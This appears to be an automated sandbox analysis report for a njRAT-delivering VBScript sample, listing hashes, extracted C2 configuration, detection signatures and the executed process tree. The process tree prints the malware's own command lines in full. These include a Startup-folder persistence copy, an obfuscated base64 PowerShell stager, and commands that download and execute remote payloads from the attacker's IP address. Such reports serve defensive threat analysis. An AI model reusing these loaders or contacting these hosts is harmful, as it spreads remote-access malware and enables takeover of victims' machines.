Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
11-01-2022 16:13
General
-
Target
kkkkkk.vbs
-
Size
484KB
-
MD5
c411c39688a4e3be08e80fcef384b448
-
SHA1
2970efe8b3902cd3edb2d41258b1888e494eef37
-
SHA256
46910a6dfb9487947703a1f69d55e76b0d6bdc560a5ed85e7fd65c48924ea6b6
-
SHA512
8bc088ce4b622e3a0cf7111eaae437cfa2211c6bfca248f6e42a166a6eede54c65fee73cf64652e8c3dd5d2f3764c556677e1bfd195873d491f5d7e7cf3ae0ee
Malware Config
Extracted
http://149.56.200.165/dll/3.txt
Extracted
njrat
0.7NC
NYAN CAT
david123456.duckdns.org:9000
remcosos.duckdns.org:1988
b14f9f9db82b4
-
reg_key
b14f9f9db82b4
-
splitter
@!#&^%$
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 3 IoCs
-
Drops startup file 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious use of AdjustPrivilegeToken 54 IoCs
-
Suspicious use of WriteProcessMemory 35 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kkkkkk.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\kkkkkk.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ KHS.vbs')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\kkkkkk.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ KHS.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC➠⇗↪Hk➠⇗↪d➠⇗↪Bl➠⇗↪Fs➠⇗↪XQBd➠⇗↪C➠⇗↪➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪g➠⇗↪D0➠⇗↪I➠⇗↪Bb➠⇗↪FM➠⇗↪eQBz➠⇗↪HQ➠⇗↪ZQBt➠⇗↪C4➠⇗↪QwBv➠⇗↪G4➠⇗↪dgBl➠⇗↪HI➠⇗↪d➠⇗↪Bd➠⇗↪Do➠⇗↪OgBG➠⇗↪HI➠⇗↪bwBt➠⇗↪EI➠⇗↪YQBz➠⇗↪GU➠⇗↪Ng➠⇗↪0➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪K➠⇗↪BO➠⇗↪GU➠⇗↪dw➠⇗↪t➠⇗↪E8➠⇗↪YgBq➠⇗↪GU➠⇗↪YwB0➠⇗↪C➠⇗↪➠⇗↪TgBl➠⇗↪HQ➠⇗↪LgBX➠⇗↪GU➠⇗↪YgBD➠⇗↪Gw➠⇗↪aQBl➠⇗↪G4➠⇗↪d➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪R➠⇗↪Bv➠⇗↪Hc➠⇗↪bgBs➠⇗↪G8➠⇗↪YQBk➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪JwBo➠⇗↪HQ➠⇗↪d➠⇗↪Bw➠⇗↪Do➠⇗↪Lw➠⇗↪v➠⇗↪DE➠⇗↪N➠⇗↪➠⇗↪5➠⇗↪C4➠⇗↪NQ➠⇗↪2➠⇗↪C4➠⇗↪Mg➠⇗↪w➠⇗↪D➠⇗↪➠⇗↪Lg➠⇗↪x➠⇗↪DY➠⇗↪NQ➠⇗↪v➠⇗↪GQ➠⇗↪b➠⇗↪Bs➠⇗↪C8➠⇗↪Mw➠⇗↪u➠⇗↪HQ➠⇗↪e➠⇗↪B0➠⇗↪Cc➠⇗↪KQ➠⇗↪p➠⇗↪Ds➠⇗↪WwBT➠⇗↪Hk➠⇗↪cwB0➠⇗↪GU➠⇗↪bQ➠⇗↪u➠⇗↪EE➠⇗↪c➠⇗↪Bw➠⇗↪EQ➠⇗↪bwBt➠⇗↪GE➠⇗↪aQBu➠⇗↪F0➠⇗↪Og➠⇗↪6➠⇗↪EM➠⇗↪dQBy➠⇗↪HI➠⇗↪ZQBu➠⇗↪HQ➠⇗↪R➠⇗↪Bv➠⇗↪G0➠⇗↪YQBp➠⇗↪G4➠⇗↪LgBM➠⇗↪G8➠⇗↪YQBk➠⇗↪Cg➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪RwBl➠⇗↪HQ➠⇗↪V➠⇗↪B5➠⇗↪H➠⇗↪➠⇗↪ZQ➠⇗↪o➠⇗↪Cc➠⇗↪QwBs➠⇗↪GE➠⇗↪cwBz➠⇗↪Ew➠⇗↪aQBi➠⇗↪HI➠⇗↪YQBy➠⇗↪Hk➠⇗↪Mw➠⇗↪u➠⇗↪EM➠⇗↪b➠⇗↪Bh➠⇗↪HM➠⇗↪cw➠⇗↪x➠⇗↪Cc➠⇗↪KQ➠⇗↪u➠⇗↪Ec➠⇗↪ZQB0➠⇗↪E0➠⇗↪ZQB0➠⇗↪Gg➠⇗↪bwBk➠⇗↪Cg➠⇗↪JwBS➠⇗↪HU➠⇗↪bg➠⇗↪n➠⇗↪Ck➠⇗↪LgBJ➠⇗↪G4➠⇗↪dgBv➠⇗↪Gs➠⇗↪ZQ➠⇗↪o➠⇗↪CQ➠⇗↪bgB1➠⇗↪Gw➠⇗↪b➠⇗↪➠⇗↪s➠⇗↪C➠⇗↪➠⇗↪WwBv➠⇗↪GI➠⇗↪agBl➠⇗↪GM➠⇗↪d➠⇗↪Bb➠⇗↪F0➠⇗↪XQ➠⇗↪g➠⇗↪Cg➠⇗↪JwB0➠⇗↪Hg➠⇗↪d➠⇗↪➠⇗↪u➠⇗↪Dk➠⇗↪N➠⇗↪➠⇗↪2➠⇗↪DM➠⇗↪Mw➠⇗↪0➠⇗↪DM➠⇗↪NQ➠⇗↪y➠⇗↪DM➠⇗↪Mw➠⇗↪v➠⇗↪HM➠⇗↪bwBt➠⇗↪HM➠⇗↪bwBj➠⇗↪C8➠⇗↪NQ➠⇗↪2➠⇗↪DE➠⇗↪Lg➠⇗↪w➠⇗↪D➠⇗↪➠⇗↪Mg➠⇗↪u➠⇗↪DY➠⇗↪NQ➠⇗↪u➠⇗↪Dk➠⇗↪N➠⇗↪➠⇗↪x➠⇗↪C8➠⇗↪Lw➠⇗↪6➠⇗↪H➠⇗↪➠⇗↪d➠⇗↪B0➠⇗↪Gg➠⇗↪Jw➠⇗↪p➠⇗↪Ck➠⇗↪';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('➠⇗↪','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://149.56.200.165/dll/3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.94633435233/somsoc/561.002.65.941//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmpA13D.tmp.vbs"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://149.56.200.165/cosmos/PS11a.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN6⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
MD5
71ca645fcb67ea22211aa569367e2a1d
SHA1becf7cf0c994f6edc3f3ed6a63542a94a6622f61
SHA2560b77274a45f37bc63509c06fe8c8d343665dc7495f19e9f0c44e59d14db5ad41
SHA51250a50559a27a321be0f991eb3ee4a253377a23cd44c6f8c16b92c686c5b870c24fe3049452eb038dda736557cb7598ad94acd15af25907b428ebe62771836f97
-
MD5
225cdbd002c693178eada95c83c6e2d2
SHA189031eec34a42f1162cc242925b29e9fb00853cb
SHA25638af283f14ff932265359a92e074d72ddfa1a3481895c7c8e0ba4f2b523f8501
SHA512dd223ecf53f33cbe30d58163cd408d0f4d189e2659895431c121eb2774afe0b67d354b48c6a0e84dead1ac1eaec38fa071a80f915e9ea03887f1118107f6068c
-
MD5
225cdbd002c693178eada95c83c6e2d2
SHA189031eec34a42f1162cc242925b29e9fb00853cb
SHA25638af283f14ff932265359a92e074d72ddfa1a3481895c7c8e0ba4f2b523f8501
SHA512dd223ecf53f33cbe30d58163cd408d0f4d189e2659895431c121eb2774afe0b67d354b48c6a0e84dead1ac1eaec38fa071a80f915e9ea03887f1118107f6068c
-
MD5
05c548eb72bde67e892b1cb73636878a
SHA1b0b3b328352b01fa5591336bcd3a9edabf6f3193
SHA256818fbca14f2bdd665b77ea6d9790ff6d483a3f114585fc669d7425f61cd52c1a
SHA512de66c0ee26a326649b538bf7849cc16cbb7c9a7ad607144f265f4b3977d4f63cc52517e28183252ee643f69b0cf0bf10679181e2b5e8ab1bd48e90b343cb785a
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
328KB
-
Filesize
8KB
-
Filesize
56KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
5.0MB
-
Filesize
408KB
-
Filesize
5.0MB
-
Filesize
624KB
-
Filesize
48KB
-
Filesize
48KB
-
Filesize
584KB
-
Filesize
96KB
-
Filesize
40KB
-
-
Filesize
48KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
-
-
Filesize
48KB
-
Filesize
408KB
-
Filesize
48KB
-
Filesize
48KB
-
Filesize
624KB
-
Filesize
5.0MB
-
Filesize
584KB
-
Filesize
4KB
-
Filesize
40KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
136KB
-
Filesize
112KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
592KB
-
Filesize
136KB
-
Filesize
5.0MB
-
Filesize
64KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
6.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
4KB
-
Filesize
4KB
-